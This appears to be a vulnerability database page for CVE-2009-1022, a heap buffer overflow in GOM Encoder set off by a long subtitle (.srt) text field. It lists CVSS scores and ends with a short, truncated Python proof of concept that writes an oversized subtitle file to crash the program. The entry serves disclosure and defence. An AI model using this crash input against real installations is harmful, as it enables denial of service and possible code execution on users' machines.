9.3
CVSSv2

CVE-2009-1022

Published: 20/03/2009 Updated: 10/10/2018
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Heap-based buffer overflow in the Preview/ Set Segment function in Gretech GOMlab GOM Encoder 1.0.0.11 and previous versions allows user-assisted remote malicious users to cause a denial of service (memory corruption and application crash) or execute arbitrary code via a long text field in a subtitle (.srt) file.

Vulnerable Product Search on Vulmon Subscribe to Product

gomlab gom encoder

Exploits

#exploitpy # # Gom Encoder (Subtitle File) Buffer Overflow PoC # by :Encrypt3dM!nd # # Orignal Advisory: # wwwsecurityfocuscom/bid/34120 # chars = 'A' * 1000000 file = open ( 'devil_insidesrt', 'w' ) filewrite ('1\n00:00:00,001 --> 00:00:06,000\n'+chars) fileclose() # milw0rmcom [2009-03-16] ...